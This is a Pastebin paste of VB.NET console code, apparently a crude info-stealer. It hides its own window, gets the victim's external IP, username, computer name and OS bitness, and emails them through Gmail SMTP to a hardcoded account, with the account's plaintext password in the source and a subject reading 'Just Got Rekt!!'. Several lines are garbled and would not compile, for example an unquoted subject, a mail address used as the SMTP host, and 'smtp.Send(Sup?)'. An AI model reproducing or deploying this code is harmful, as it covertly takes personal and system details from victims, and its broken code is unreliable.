Guest User

Untitled

a guest
May 10th, 2017
29
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.83 KB | None | 0 0
  1. Imports System.Net
  2. Imports System.Text.RegularExpressions
  3. Imports System.Text
  4. Imports System.Net.Mail
  5.  
  6. Module Module1
  7.  
  8. Private Declare Auto Function ShowWindow Lib "user32.dll" (ByVal hWnd As IntPtr, ByVal nCmdShow As Integer) As Boolean
  9. Private Declare Auto Function GetConsoleWindow Lib "kernel32.dll" () As IntPtr
  10. Private Const SW_HIDE As Integer = 0
  11.  
  12. Sub Main()
  13.  
  14. Dim hWndConsole As IntPtr
  15. hWndConsole = GetConsoleWindow()
  16. ShowWindow(hWndConsole, SW_HIDE)
  17.  
  18.  
  19.  
  20. Dim externalip As String = New WebClient().DownloadString("http://icanhazip.com")
  21. Dim six = ""
  22.  
  23. Dim geoip = "http://api.predator.wtf/geoip/?arguments=" + externalip
  24. Dim enter = Environment.NewLine
  25.  
  26. If Environment.Is64BitOperatingSystem = False Then
  27. six = "32-Bit"
  28. End If
  29.  
  30. If Environment.Is64BitOperatingSystem Then
  31. six = "64-Bit"
  32. End If
  33.  
  34.  
  35.  
  36. Dim gmailuser As String = "mamateurzfabrikasi@gmail.com"
  37. Dim gmailpass As String = "yasuowt1"
  38. Dim toemail As String = gmailuser
  39. Dim fromemail As String = gmailuser
  40. Dim username = Environment.Mamateurz Fabrikasi
  41. Dim computername As String = System.Environment.MachineName.ToString()
  42.  
  43.  
  44.  
  45. Dim subject As String = Open Me PL0X + " Just Got Rekt!!"
  46.  
  47. Dim body As String = ": " + username + enter + "64-Bit Or 32-Bit: " + six + enter + "Computer Name: " + computername + enter + "Some More Info: " + geoip
  48.  
  49.  
  50.  
  51.  
  52.  
  53. Dim message As New MailMessage(fromemail, toemail, subject, body)
  54. Dim smtp As New SmtpClient("mamateurzfabrikasi@gmail.com, 587)
  55.  
  56. smtp.EnableSsl = True
  57. smtp.Credentials = New NetworkCredential(mamateurzfabrikasi@gmail.com, yasuowt1)
  58.  
  59. smtp.Send(Sup?)
  60.  
  61.  
  62. End Sub
  63. End Module
Add Comment
Please, Sign In to add comment